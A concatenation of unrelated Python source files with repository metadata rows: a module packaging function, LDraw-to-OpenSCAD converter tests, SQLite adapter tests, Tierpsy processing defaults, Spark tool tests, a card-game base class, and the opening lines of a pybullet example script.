    metainfo.set('meta', 'friendly_name', config.friendly_name)
    metainfo.set('meta', 'hash', package_hash)
    metainfo.set('meta', 'hash_type', 'sha1')
    metainfo.set('meta', 'type', 'configuration')
    metainfo.set('meta', 'built', str(datetime.datetime.now()))
    metainfo.set('meta', 'built_by', os.getlogin())
    metainfo.set('meta', 'version', version)
    with open(tmp_metainfo, 'w+') as f:
        metainfo.write(f)
    # Last create .pack file in temporary dir
    with tarfile.open(tmp_pack, 'w') as pack:
        for entry in os.listdir(config.conf_directory):
            pack.add(config.conf_directory + entry, arcname=entry)
        pack.add(tmp_manifest, 'MANIFEST')
        pack.add(tmp_metainfo, 'METAINF')
    #
    # Copy file to cwd or argument --file destination
    #
    _dest = os.getcwd() + os.sep + config.name + '-' + version + '.pack'
    if 'file' in args and args.file is not None:
        _dest = args.file
    shutil.copyfile(tmp_pack, _dest)
    #
    # Remove temporary dir
    #
    shutil.rmtree(dir)
    pass
def package_module(args, context, info, module):
    """Build a ``<name>-<version>.pack`` tar archive for a module.

    Near-duplicate of package_config with 'module' metadata instead of
    'configuration'.

    :param args: parsed CLI arguments (only ``args.file`` is used here)
    :param context: NOTE(review): the caller actually passes the package
        *name* in this position and the value is never used -- confirm
        the intended signature
    :param info: ConfigParser holding the ``*.info`` descriptor contents
    :param module: module object exposing name, friendly_name and
        module_directory
    """
    # NOTE(review): info.get raises NoOptionError before the friendlier
    # PackageException below can fire when 'version' is missing.
    version = info.get('general', 'version')
    if not info.has_option('general', 'version'):
        raise PackageException('No version, please provide a valid version tag in module .info file for ' + module.name)
    print(module.name + "(" + version + ") from " + module.module_directory)
    # Create temporary directory
    # NOTE(review): the temp dir is only removed on the happy path; any
    # exception below leaks it (no try/finally).
    dir = tempfile.mkdtemp('am-package') + os.sep
    if not os.path.exists(dir):
        os.makedirs(dir);
    tmp_pack = dir + module.name + '.pack'
    tmp_manifest = dir + 'MANIFEST'
    tmp_metainfo = dir + 'METAINF'
    # Create MANIFEST
    # The package hash is a sha1 over every "<relpath> sha1 <filehash>" entry.
    package_hash = hashlib.sha1()
    with open(tmp_manifest, 'w+') as manifest:
        for root, dirs, files in os.walk(module.module_directory, topdown=False):
            for name in files:
                f = os.path.join(root, name)
                rel = os.path.relpath(f, module.module_directory)
                hv = utils.hash_file(f)
                print(hv + "\t" + rel)
                data = rel + " sha1 " + hv
                data = data.encode('utf-8')
                package_hash.update(data)
                manifest.write(rel + " sha1 " + hv + "\n")
    package_hash = package_hash.hexdigest();
    # Create METAINF
    # NOTE(review): SafeConfigParser is deprecated (removed in Python 3.12)
    # and os.getlogin() can raise OSError when no controlling terminal exists.
    metainfo = configparser.SafeConfigParser()
    metainfo.add_section('meta')
    metainfo.set('meta', 'name', module.name)
    metainfo.set('meta', 'friendly_name', module.friendly_name)
    metainfo.set('meta', 'hash', package_hash)
    metainfo.set('meta', 'hash_type', 'sha1')
    metainfo.set('meta', 'type', 'module')
    metainfo.set('meta', 'built', str(datetime.datetime.now()))
    metainfo.set('meta', 'built_by', os.getlogin())
    metainfo.set('meta', 'version', version);
    with open(tmp_metainfo, 'w+') as f:
        metainfo.write(f)
    # Last create .pack file in temporary dir
    with tarfile.open(tmp_pack, 'w') as pack:
        for entry in os.listdir(module.module_directory):
            pack.add(module.module_directory + entry, arcname=entry)
        pack.add(tmp_manifest, 'MANIFEST')
        pack.add(tmp_metainfo, 'METAINF')
    # Copy file to cwd or argument --file destination
    dest = os.getcwd() + os.sep + module.name + '-' + version + '.pack'
    if 'file' in args and args.file != None:
        dest = args.file
    shutil.copyfile(tmp_pack, dest)
    # Remove temporary dir
    shutil.rmtree(dir)
    pass
acf6cb61d43d92b187aad970fa65d799432e44cb | 12,972 | py | Python | test_ldraw_to_scad.py | orionrobots/ldraw-to-scad | ed9ee512d46547671c685cf434e72daa1c8484a2 | [
"Apache-2.0"
] | 4 | 2019-02-09T21:41:57.000Z | 2021-01-18T22:09:23.000Z | test_ldraw_to_scad.py | orionrobots/ldraw-to-scad | ed9ee512d46547671c685cf434e72daa1c8484a2 | [
"Apache-2.0"
] | null | null | null | test_ldraw_to_scad.py | orionrobots/ldraw-to-scad | ed9ee512d46547671c685cf434e72daa1c8484a2 | [
"Apache-2.0"
] | 1 | 2021-01-18T22:09:30.000Z | 2021-01-18T22:09:30.000Z | from unittest import TestCase
import mock
import os
from ldraw_to_scad import LDrawConverter, Module
class TestModule(TestCase):
    """Unit tests for the Module helper."""

    def default_runner(self, filename='a_module'):
        """Build a Module with a default filename."""
        return Module(filename=filename)

    def test_it_should_make_sensible_module_names(self):
        """Module names must be valid C identifiers."""
        cases = {
            "stud.dat": "n__stud",
            "s\\stuff.dat": "n__s__stuff",
            "4744.dat": "n__4744",
            "2-4cyli.dat": "n__2_4cyli",
        }
        for filename, expected_name in cases.items():
            self.assertEqual(Module.make_module_name(filename), expected_name)
class TestLDrawConverter(TestCase):
    """Tests for LDrawConverter: line-type handling, module emission and MPD files."""
    def default_runner(self, module_filename="__main__"):
        """Return a fresh (LDrawConverter, Module) pair for a test."""
        module = Module(module_filename)
        return LDrawConverter(), module
    def test_it_should_convert_comments(self):
        """Type-0 LDraw lines become OpenSCAD // comments."""
        # setup
        part_lines_to_test =[
            ["0 Stud", "// Stud"],
            ["0", "// "]
        ]
        converter, module = self.default_runner()
        converter.current_module = module
        # Test
        # Assert
        for line, expected in part_lines_to_test:
            output_scad = converter.convert_line(line)
            self.assertEqual(output_scad, [expected])
    def test_it_should_convert_type_1_line_into_module_ref(self):
        """A type-1 sub-file reference becomes a multmatrix + module call."""
        # setup
        # This is a silly matrix - but the components are easy to pick out
        # 1 <colour> x y z a b c d e f g h i <file>
        part_line = "1 16 25 24 23 22 21 20 19 18 17 16 15 14 simple_test.dat"
        converter, module = self.default_runner()
        # Test
        converter.current_module = module
        result = converter.convert_line(part_line)
        # Assert
        print(module.dependancies)
        self.assertIn('n__simple_test', module.dependancies)
        self.assertEqual(result, [
            "color(lego_colours[16])",
            "  multmatrix([",
            "   [22, 21, 20, 25],",
            "   [19, 18, 17, 24],",
            "   [16, 15, 14, 23],",
            "   [0, 0, 0, 1]",
            "  ])",
            "  n__simple_test();"
        ])
    def test_it_should_ignore_type_2_line(self):
        """Type-2 (line) records produce no SCAD output, indented or not."""
        # setup
        part_line = "2 24 40 96 -20 -40 96 -20"
        converter, module = self.default_runner()
        # test
        converter.current_module = module
        output_scad = converter.convert_line(part_line)
        # assert
        self.assertEqual(output_scad, [])
        # With indent
        output_scad = converter.convert_line(part_line, indent=2)
        # assert
        self.assertEqual(output_scad, [])
    def test_it_should_render_type_3_tri(self):
        """Type-3 triangles become a 3-point polyhedron; indent shifts output."""
        # setup
        part_line = "3 16 -2.017 -35.943 0 0 -35.942 -3.6 2.017 -35.943 0"
        converter, module = self.default_runner()
        # test
        converter.current_module = module
        output_scad = converter.convert_line(part_line)
        # assert
        self.assertEqual(output_scad, [
            "color(lego_colours[16])",
            "  polyhedron(points=[",
            "   [-2.017, -35.943, 0],",
            "   [0, -35.942, -3.6],",
            "   [2.017, -35.943, 0]",
            "  ], faces = [[0, 1, 2]]);"
        ])
        # test with indent
        output_scad = converter.convert_line(part_line, indent=2)
        # assert
        self.assertEqual(output_scad, [
            "  color(lego_colours[16])",
            "    polyhedron(points=[",
            "     [-2.017, -35.943, 0],",
            "     [0, -35.942, -3.6],",
            "     [2.017, -35.943, 0]",
            "    ], faces = [[0, 1, 2]]);"
        ])
    def test_it_should_render_a_quad(self):
        """Type-4 quads become a 4-point polyhedron."""
        # setup
        part_line = "4 16 1 1 0 0.9239 1 0.3827 0.9239 0 0.3827 1 0 0"
        converter, module = self.default_runner()
        # Test
        converter.current_module = module
        output_scad = converter.convert_line(part_line)
        # Assert
        self.assertEqual(output_scad, [
            "color(lego_colours[16])",
            "  polyhedron(points=[",
            "   [1, 1, 0],",
            "   [0.9239, 1, 0.3827],",
            "   [0.9239, 0, 0.3827],",
            "   [1, 0, 0]",
            "  ], faces = [[0, 1, 2, 3]]);"
        ])
    def test_it_should_be_able_to_find_part_path(self):
        """Library indexing resolves part names to paths under lib/ldraw."""
        # WARNING: This test requires having lib/ldraw setup.
        # setup
        # part tests - name, expected location
        part_tests = [
            ['1.dat', os.path.join('lib', 'ldraw', 'parts', '1.dat')],
            ['4-4cyli.dat', os.path.join('lib', 'ldraw', 'p', '4-4cyli.dat')],
            ['s\\4744s01.dat', os.path.join('lib', 'ldraw', 'parts', 's', '4744s01.dat')]
        ]
        # Test
        converter, module = self.default_runner()
        converter.index_library()
        # Assert
        for part_name, expected_path in part_tests:
            self.assertEqual(converter.find_part(part_name), expected_path)
    def test_it_should_ignore_the_optional_line(self):
        """Type-5 (optional line) records produce no SCAD output."""
        # setup
        part_line = "5 24 0.7071 0 -0.7071 0.7071 1 -0.7071 0.9239 0 -0.3827 0.3827 0 -0.9239"
        # test
        converter, module = self.default_runner()
        converter.current_module = module
        output_scad = converter.convert_line(part_line)
        # assert
        self.assertEqual(output_scad, [])
    def test_multiple_lines(self):
        """process_lines accumulates converted output on the module."""
        # setup
        lines = [
            "0 Cylinder 1.0",
            "0 Name: 4-4cyli.dat",
            "4 16 1 1 0 0.9239 1 0.3827 0.9239 0 0.3827 1 0 0",
            "5 24 1 0 0 1 1 0 0.9239 0 0.3827 0.9239 0 -0.3827",
            "4 16 0.9239 1 0.3827 0.7071 1 0.7071 0.7071 0 0.7071 0.9239 0 0.3827",
            "5 24 0.9239 0 0.3827 0.9239 1 0.3827 0.7071 0 0.7071 1 0 0",
            "4 16 0.7071 1 0.7071 0.3827 1 0.9239 0.3827 0 0.9239 0.7071 0 0.7071",
        ]
        # Test
        converter, module = self.default_runner()
        converter.process_lines(module, lines)
        # Assert
        self.assertEqual(module.lines, [
            "// Cylinder 1.0",
            "// Name: 4-4cyli.dat",
            "color(lego_colours[16])",
            "  polyhedron(points=[",
            "   [1, 1, 0],",
            "   [0.9239, 1, 0.3827],",
            "   [0.9239, 0, 0.3827],",
            "   [1, 0, 0]",
            "  ], faces = [[0, 1, 2, 3]]);",
            "color(lego_colours[16])",
            "  polyhedron(points=[",
            "   [0.9239, 1, 0.3827],",
            "   [0.7071, 1, 0.7071],",
            "   [0.7071, 0, 0.7071],",
            "   [0.9239, 0, 0.3827]",
            "  ], faces = [[0, 1, 2, 3]]);",
            "color(lego_colours[16])",
            "  polyhedron(points=[",
            "   [0.7071, 1, 0.7071],",
            "   [0.3827, 1, 0.9239],",
            "   [0.3827, 0, 0.9239],",
            "   [0.7071, 0, 0.7071]",
            "  ], faces = [[0, 1, 2, 3]]);",
        ])
    def test_reading_file(self):
        """process_main converts a whole .dat file read from disk."""
        # Setup
        test_file = "simple_test.dat"
        # test
        converter, _ = self.default_runner()
        with open(test_file) as fd:
            lines = fd.readlines()
        output = converter.process_main(lines)
        # assert
        self.assertEqual(output, [
            "// Simple Test File",
            "// Name: simple_test.dat",
            "",
            "color(lego_colours[16])",
            "  polyhedron(points=[",
            "   [1, 1, 1],",
            "   [1, 1, -1],",
            "   [-1, 1, -1],",
            "   [-1, 1, 1]",
            "  ], faces = [[0, 1, 2, 3]]);",
            ""
        ])
    def test_it_process_type_1_line_into_module(self):
        """A type-1 reference pulls the sub-file in as a SCAD module definition."""
        # setup
        part_lines = ["1 16 25 24 23 22 21 20 19 18 17 16 15 14 simple_test.dat"]
        converter, _ = self.default_runner()
        # test
        result = converter.process_main(part_lines)
        # assert
        self.assertListEqual(
            result,
            [
                "module n__simple_test() {",
                "  // Simple Test File",
                "  // Name: simple_test.dat",
                "  ",
                "  color(lego_colours[16])",
                "    polyhedron(points=[",
                "     [1, 1, 1],",
                "     [1, 1, -1],",
                "     [-1, 1, -1],",
                "     [-1, 1, 1]",
                "    ], faces = [[0, 1, 2, 3]]);",
                "  ",
                "}",
                "color(lego_colours[16])",
                "  multmatrix([",
                "   [22, 21, 20, 25],",
                "   [19, 18, 17, 24],",
                "   [16, 15, 14, 23],",
                "   [0, 0, 0, 1]",
                "  ])",
                "  n__simple_test();"
            ]
        )
    def test_multiple_lines_should_only_make_a_single_module_for_multiple_type_1_refs(self):
        """Two references to the same sub-file emit one module, two call sites."""
        # setup
        lines = [
            "1 16 25 24 23 22 21 20 19 18 17 16 15 14 simple_test.dat",
            "1 16 2.5 2.4 2.3 2.2 2.1 2.0 1.9 1.8 1.7 1.6 1.5 1.4 simple_test.dat",
        ]
        # Test
        converter, _ = self.default_runner()
        result = converter.process_main(lines)
        # Assert
        self.assertEqual(result, [
            "module n__simple_test() {",
            "  // Simple Test File",
            "  // Name: simple_test.dat",
            "  ",
            "  color(lego_colours[16])",
            "    polyhedron(points=[",
            "     [1, 1, 1],",
            "     [1, 1, -1],",
            "     [-1, 1, -1],",
            "     [-1, 1, 1]",
            "    ], faces = [[0, 1, 2, 3]]);",
            "  ",
            "}",
            "color(lego_colours[16])",
            "  multmatrix([",
            "   [22, 21, 20, 25],",
            "   [19, 18, 17, 24],",
            "   [16, 15, 14, 23],",
            "   [0, 0, 0, 1]",
            "  ])",
            "  n__simple_test();",
            "color(lego_colours[16])",
            "  multmatrix([",
            "   [2.2, 2.1, 2.0, 2.5],",
            "   [1.9, 1.8, 1.7, 2.4],",
            "   [1.6, 1.5, 1.4, 2.3],",
            "   [0, 0, 0, 1]",
            "  ])",
            "  n__simple_test();",
        ])
    def test_try_simplest_mpd(self):
        """An inline 0 FILE/0 NOFILE block becomes its own SCAD module."""
        # setup
        lines = [
            # 1 - ref the mpd
            "1 16 225 224 223 222 221 220 219 218 217 216 215 214 mdr_inner.ldr",
            "0 NOFILE",
            "0 FILE mdr_inner.ldr",
            "4 16 1 1 0 0.9239 1 0.3827 0.9239 0 0.3827 1 0 0",
            "0 NOFILE"
        ]
        # test
        converter, _ = self.default_runner()
        result = converter.process_main(lines)
        # assert
        self.assertEqual(result, [
            "module n__mdr_inner() {",
            "  color(lego_colours[16])",
            "    polyhedron(points=[",
            "     [1, 1, 0],",
            "     [0.9239, 1, 0.3827],",
            "     [0.9239, 0, 0.3827],",
            "     [1, 0, 0]",
            "    ], faces = [[0, 1, 2, 3]]);",
            "  ",
            "}",
            "color(lego_colours[16])",
            "  multmatrix([",
            "   [222, 221, 220, 225],",
            "   [219, 218, 217, 224],",
            "   [216, 215, 214, 223],",
            "   [0, 0, 0, 1]",
            "  ])",
            "  n__mdr_inner();",
            "",
        ])
    def test_loading_an_mpd(self):
        """A nested MPD file on disk yields modules for each sub-file plus the body."""
        # Setup
        mpd_filename = "mpd_test.dat"
        # Test
        converter, _ = self.default_runner()
        with open(mpd_filename) as fd:
            output = converter.process_main(fd)
        # Assert
        self.maxDiff = None
        self.assertListEqual(output,
        [
            "module n__simple_test() {",
            "  // Simple Test File",
            "  // Name: simple_test.dat",
            "  ",
            "  color(lego_colours[16])",
            "    polyhedron(points=[",
            "     [1, 1, 1],",
            "     [1, 1, -1],",
            "     [-1, 1, -1],",
            "     [-1, 1, 1]",
            "    ], faces = [[0, 1, 2, 3]]);",
            "  ",
            "}",
            "module n__mdr_inner() {",
            "  color(lego_colours[16])",
            "    multmatrix([",
            "     [22, 21, 20, 25],",
            "     [19, 18, 17, 24],",
            "     [16, 15, 14, 23],",
            "     [0, 0, 0, 1]",
            "    ])",
            "    n__simple_test();",
            "  ",
            "}",
            "// Simple MPD File",
            "// Name: mdp_test.dat",
            "",
            "color(lego_colours[16])",
            "  multmatrix([",
            "   [222, 221, 220, 225],",
            "   [219, 218, 217, 224],",
            "   [216, 215, 214, 223],",
            "   [0, 0, 0, 1]",
            "  ])",
            "  n__mdr_inner();",
            "",
            ""
        ])
acf6cbdd6763fc71d8c3c525548564c05eea5039 | 9,493 | py | Python | tests/test_sqlite.py | tor4z/Skua | b45b3aafc045ef19f5efb6d2b7e71479d8d1d6c7 | [
"MIT"
] | null | null | null | tests/test_sqlite.py | tor4z/Skua | b45b3aafc045ef19f5efb6d2b7e71479d8d1d6c7 | [
"MIT"
] | null | null | null | tests/test_sqlite.py | tor4z/Skua | b45b3aafc045ef19f5efb6d2b7e71479d8d1d6c7 | [
"MIT"
] | null | null | null | import unittest
import random
from skua.adapter.sqlite import SQLiteDB
from skua.adapter.database import (DatabaseError,
DatabaseWarning)
TEST_DB = "skua_test"
# Alphabet of identifier-safe characters used for random table/value names.
_STR = "asbcdefhijklmnopqrstuvwxyz_"


def random_str(k):
    """Return a random string of length *k* drawn from _STR.

    Bug fix: the original hard-coded ``k=5`` in random.choices, so callers
    asking for other lengths (e.g. ``random_str(20)``) silently got 5
    characters back.
    """
    return "".join(random.choices(_STR, k=k))
class TestSQLite(unittest.TestCase):
def new_db(self):
sqlite = SQLiteDB()
sqlite.connect()
return sqlite
def test_exit_table(self):
sqlite = self.new_db()
self.assertFalse(sqlite.table_exit("some_table_unexist"))
sqlite.close()
def test_new_delete_table(self):
sqlite = self.new_db()
for _ in range(5):
table = random_str(5)
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
self.assertTrue(sqlite.table_exit(table))
sqlite.delete_table(table)
self.assertFalse(sqlite.table_exit(table))
sqlite.close()
def test_insert_find_remove(self):
sqlite = self.new_db()
table = "test_insert"
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
for _ in range(50):
name = random_str(5)
age = random.randint(0, 100)
sqlite.add_one(table, {
"name": name,
"age": age})
user = sqlite.find_one(table, {
"name": name})
self.assertEqual(user["name"], name)
name = random_str(5)
age = 20
sqlite.add_one(table, {
"name": name,
"age": age})
users = sqlite.find_many(table, {"age": age})
self.assertGreater(len(users), 0)
least = 10
users = sqlite.find_many(table, {"age": SQLiteDB.gt(least)})
for user in users:
self.assertGreater(user["age"], least)
sqlite.delete_table(table)
sqlite.close()
def test_delete_item(self):
sqlite = self.new_db()
table = "test_delete_item"
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
for _ in range(50):
name = random_str(5)
age = random.randint(0, 100)
sqlite.add_one(table, {
"name": name,
"age": age})
user = sqlite.find_one(table, {"name": name})
self.assertIsNotNone(user)
sqlite.remove(table, {"name": name})
user = sqlite.find_one(table, {"name": name})
self.assertIsNone(user)
sqlite.delete_table(table)
sqlite.close()
def test_update_item(self):
sqlite = self.new_db()
table = "test_update_item"
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
for _ in range(50):
name = random_str(5)
age = random.randint(0, 100)
sqlite.add_one(table, {
"name": name,
"age": age})
old_user = sqlite.find_one(table, {"name": name})
new_age = random.randint(0, 100)
sqlite.update(table, {"age": new_age}, {"name": name})
new_user = sqlite.find_one(table, {"name": name})
self.assertEqual(new_user["age"], new_age)
sqlite.delete_table(table)
sqlite.close()
def test_add_many(self):
sqlite = self.new_db()
table = "test_add_many"
count = 50
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
users = []
for _ in range(count):
name = random_str(5)
age = random.randint(0, 100)
users.append({"name": name,
"age": age})
sqlite.add_many(table, users)
users = sqlite.find_many(table, {})
self.assertEqual(len(users), count)
sqlite.delete_table(table)
sqlite.close()
def test_count(self):
sqlite = self.new_db()
table = "test_count"
count = 100
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
users = []
eq5 = 0
for _ in range(count):
name = random_str(5)
age = random.randint(0, 10)
if age == 5:
eq5 += 1
users.append({
"name": name,
"age": age})
sqlite.add_many(table, users)
self.assertEqual(sqlite.count(table, {}), count)
self.assertEqual(sqlite.count(table, {"age": 5}), eq5)
sqlite.delete_table(table)
sqlite.close()
def test_add_update(self):
sqlite = self.new_db()
table = "test_add_update"
count = 50
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
for _ in range(count):
name = random_str(20)
age = random.randint(0, 49)
user = {"name": name,
"age": age}
sqlite.add_update(table, user)
for _ in range(count):
user = sqlite.find_one(table, {})
user["age"] = random.randint(50, 100)
sqlite.add_update(table, user, {"name": user["name"]})
new_user = sqlite.find_one(table, {"name": user["name"]})
self.assertTrue(user["age"] == new_user["age"])
new_users = sqlite.find_many(table, {"name": user["name"]})
self.assertEqual(len(new_users), 1)
user["age"] = random.randint(101, 120)
sqlite.add_update(table, user)
new_users = sqlite.find_many(table, {"name": user["name"]})
self.assertEqual(len(new_users), 2)
sqlite.remove(table, {"name": user["name"]})
sqlite.delete_table(table)
sqlite.close()
def test_find_gt_ge_lt_le(self):
sqlite = self.new_db()
table = "test_find_gt_ge_lt_le"
count = 200
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
users = []
for _ in range(count):
name = random_str(5)
age = random.randint(0, 100)
user = {"name": name,
"age": age}
users.append(user)
sqlite.add_one(table, user)
users_gt_50 = sqlite.find_many(table, {"age": SQLiteDB.gt(50)})
for user in users_gt_50:
self.assertGreater(user["age"], 50)
users_ge_50 = sqlite.find_many(table, {"age": SQLiteDB.ge(50)})
for user in users_ge_50:
self.assertGreaterEqual(user["age"], 50)
users_lt_50 = sqlite.find_many(table, {"age": SQLiteDB.lt(50)})
for user in users_lt_50:
self.assertLess(user["age"], 50)
users_le_50 = sqlite.find_many(table, {"age": SQLiteDB.le(50)})
for user in users_le_50:
self.assertLessEqual(user["age"], 50)
sqlite.delete_table(table)
sqlite.close()
def test_type_checker(self):
sqlite = self.new_db()
table = "test_find_one_order"
count = 5
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
users = []
for _ in range(count):
name = random_str(5)
age = random.randint(0, 100)
user = [("name", name),
("age", age)]
users.append(user)
with self.assertRaises(TypeError):
sqlite.add(table, user)
with self.assertRaises(TypeError):
sqlite.add_many(table, {})
def test_connect_twice(self):
sqlite = SQLiteDB()
sqlite.connect()
with self.assertRaises(DatabaseError):
sqlite.connect()
sqlite.close()
def test_find_many_order(self):
sqlite = self.new_db()
table = "test_find_many_order"
count = 50
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
users = []
for _ in range(count):
name = random_str(5)
age = random.randint(0, 100)
user = {"name": name,
"age": age}
users.append(user)
sqlite.add_one(table, user)
users = sqlite.find_many(table, {}, orderby="age")
old_age = 0
for user in users:
self.assertGreaterEqual(user["age"], old_age)
old_age = user["age"]
sqlite.delete_table(table)
sqlite.close()
def test_find_one_order(self):
sqlite = self.new_db()
table = "test_find_one_order"
count = 50
sqlite.create_table(table, {
"name": "varchar(255)",
"age" : "int"})
users = []
for _ in range(count):
name = random_str(5)
age = random.randint(0, 100)
user = {"name": name,
"age": age}
users.append(user)
sqlite.add_one(table, user)
old_age = 0
for _ in range(count):
user = sqlite.find_one(table, {}, orderby="age")
self.assertGreaterEqual(user["age"], old_age)
old_age = user["age"]
sqlite.delete_table(table)
sqlite.close()
| 31.022876 | 72 | 0.510165 |
acf6cc3f861b8c90411822317ce68a8f30a4f89d | 3,263 | py | Python | tierpsy/helper/params/docs_process_param.py | mgh17/tierpsy-tracker | a18c06aa80a5fb22fd51563d82c639b520742777 | [
"MIT"
] | 9 | 2021-01-11T10:49:21.000Z | 2022-02-28T15:48:00.000Z | tierpsy/helper/params/docs_process_param.py | mgh17/tierpsy-tracker | a18c06aa80a5fb22fd51563d82c639b520742777 | [
"MIT"
] | 18 | 2020-05-08T15:43:08.000Z | 2022-03-23T10:19:24.000Z | tierpsy/helper/params/docs_process_param.py | mgh17/tierpsy-tracker | a18c06aa80a5fb22fd51563d82c639b520742777 | [
"MIT"
] | 10 | 2019-12-18T12:10:12.000Z | 2022-01-05T09:12:47.000Z | '''
List of default values and description of the tierpsy.processing.progressMultipleFilesFun
'''
import os
from tierpsy import IS_FROZEN
from .helper import repack_dflt_list
#get 90% of the number of cores as the default max_num_process
import multiprocessing as mp
_max_num_process = max(1, int(mp.cpu_count()*0.9))
#set this to false if it is a compiled version (we do not want to scare the users with the traceback information)
_is_debug = not IS_FROZEN
dflt_args_list = [
('video_dir_root',
'',
'Root directory where the raw videos are located.'
),
('mask_dir_root',
'',
'''
Root directory where the masked videos (after COMPRESSION) are located or will be stored.
If it is not given it will be created replacing RawVideos by MaskedVideos in the video_dir_root.
'''
),
('results_dir_root',
'',
'''
Root directory where the tracking results are located or will be stored.
If it is not given it will be created replacing MaskedVideos by Results in the mask_dir_root.
'''
),
('tmp_dir_root',
os.path.join(os.path.expanduser("~"), 'Tmp'),
'Temporary directory where the unfinished analysis files are going to be stored.'
),
('videos_list',
'',
'''
File containing the full path of the files to be analyzed.
If it is not given files will be searched in video_dir_root or mask_dir_root
using pattern_include and pattern_exclude.
'''
),
('json_file',
'',
'File (.json) containing the tracking parameters.'
),
('max_num_process',
_max_num_process,
'Maximum number of files to be processed simultaneously.'
),
('pattern_include',
'*.hdf5',
'Pattern used to search files to be analyzed.'
),
('pattern_exclude',
'',
'Pattern used to exclude files to be analyzed.'
),
('is_copy_video',
False,
'Set **true** to copy the raw videos files to the temporary directory.'
),
('copy_unfinished',
False,
'Copy files to the final destination even if the analysis was not completed successfully.'
),
('analysis_checkpoints',
[],
'Points in the analysis to be executed.'),
('force_start_point',
'',
'Force the program to start at a specific point in the analysis.'
),
('end_point',
'',
'Stop the analysis at a specific point.'
),
('only_summary',
False,
'Set **true** if you only want to see a summary of how many files are going to be analyzed.'
),
('unmet_requirements',
False,
'Use this flag if you only want to print the unmet requirements of the invalid source files.'
),
('refresh_time',
10.,
'Refresh time in seconds of the progress screen.'
),
('is_debug',
_is_debug,
'Print debug information after an error.'
),
]
process_valid_options = {}
proccess_args_dflt, proccess_args_info = repack_dflt_list(dflt_args_list, valid_options=process_valid_options)
| 29.663636 | 113 | 0.607723 |
acf6cd2052a06b3eb7866132e6d2fd7b00da6ee6 | 855 | py | Python | tests/test_spark_tools.py | sobolevn/paasta | 8b87e0b13816c09b3d063b6d3271e6c7627fd264 | [
"Apache-2.0"
] | 1,711 | 2015-11-10T18:04:56.000Z | 2022-03-23T08:53:16.000Z | tests/test_spark_tools.py | sobolevn/paasta | 8b87e0b13816c09b3d063b6d3271e6c7627fd264 | [
"Apache-2.0"
] | 1,689 | 2015-11-10T17:59:04.000Z | 2022-03-31T20:46:46.000Z | tests/test_spark_tools.py | sobolevn/paasta | 8b87e0b13816c09b3d063b6d3271e6c7627fd264 | [
"Apache-2.0"
] | 267 | 2015-11-10T19:17:16.000Z | 2022-02-08T20:59:52.000Z | from unittest import mock
import pytest
from paasta_tools import spark_tools
def test_get_webui_url():
    """The Spark web-UI URL is built from the patched local FQDN and port."""
    with mock.patch("socket.getfqdn", return_value="1.2.3.4"):
        url = spark_tools.get_webui_url("1234")
        assert url == "http://1.2.3.4:1234"
# Cases: bare shell command, script invocation, command with trailing args,
# and the history-server which must be left untouched.
@pytest.mark.parametrize(
    "cmd,expected",
    [
        ("spark-shell", "spark-shell --conf spark.max.cores=100"),
        (
            "/venv/bin/pyspark test.py",
            "/venv/bin/pyspark --conf spark.max.cores=100 test.py",
        ),
        (
            "spark-submit script.py --other args",
            "spark-submit --conf spark.max.cores=100 script.py --other args",
        ),
        ("history-server", "history-server"),
    ],
)
def test_inject_spark_conf_str(cmd, expected):
    """inject_spark_conf_str inserts the conf string right after the binary."""
    assert (
        spark_tools.inject_spark_conf_str(cmd, "--conf spark.max.cores=100") == expected
    )
acf6cd540a9de626f765594d81fcb47322899f2e | 1,022 | py | Python | Python_OOP_Softuni/Exam_Prep_02AprilExam/project/card/card.py | borisboychev/SoftUni | 22062312f08e29a1d85377a6d41ef74966d37e99 | [
"MIT"
] | 1 | 2020-12-14T23:25:19.000Z | 2020-12-14T23:25:19.000Z | Python_OOP_Softuni/Exam_Prep_02AprilExam/project/card/card.py | borisboychev/SoftUni | 22062312f08e29a1d85377a6d41ef74966d37e99 | [
"MIT"
] | null | null | null | Python_OOP_Softuni/Exam_Prep_02AprilExam/project/card/card.py | borisboychev/SoftUni | 22062312f08e29a1d85377a6d41ef74966d37e99 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
class Card(ABC):
    """Abstract base class for a playing card with validated attributes."""

    @abstractmethod
    def __init__(self, name, damage_points, health_points):
        """Store the validated name, damage and health values."""
        self.name = name
        self.damage_points = damage_points
        self.health_points = health_points

    @property
    def name(self):
        """The card's display name; must not be the empty string."""
        return self._name

    @name.setter
    def name(self, new_name):
        if new_name == "":
            raise ValueError("Card's name cannot be an empty string.")
        self._name = new_name

    @property
    def damage_points(self):
        """Damage dealt by the card; must be non-negative."""
        return self._damage_points

    @damage_points.setter
    def damage_points(self, points):
        if points < 0:
            raise ValueError("Card's damage points cannot be less than zero.")
        self._damage_points = points

    @property
    def health_points(self):
        """The card's hit points; must be non-negative."""
        return self._health_points

    @health_points.setter
    def health_points(self, points):
        if points < 0:
            raise ValueError("Card's HP cannot be less than zero.")
        self._health_points = points
acf6cf0f338211b58b347775ef40666ed4828ad4 | 926 | py | Python | examples/pybullet/gym/pybullet_envs/baselines/enjoy_pybullet_zed_racecar.py | frk2/bullet3 | 225d823e4dc3f952c6c39920c3f87390383e0602 | [
"Zlib"
] | 51 | 2018-11-11T12:47:38.000Z | 2022-03-06T08:39:43.000Z | examples/pybullet/gym/pybullet_envs/baselines/enjoy_pybullet_zed_racecar.py | frk2/bullet3 | 225d823e4dc3f952c6c39920c3f87390383e0602 | [
"Zlib"
] | 2 | 2019-11-15T03:21:45.000Z | 2020-09-10T11:53:58.000Z | examples/pybullet/gym/pybullet_envs/baselines/enjoy_pybullet_zed_racecar.py | frk2/bullet3 | 225d823e4dc3f952c6c39920c3f87390383e0602 | [
"Zlib"
] | 14 | 2018-12-12T09:12:14.000Z | 2021-10-17T14:30:25.000Z | #add parent dir to find package. Only needed for source code build, pip install doesn't need it.
import os, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
os.sys.path.insert(0,parentdir)
import gym
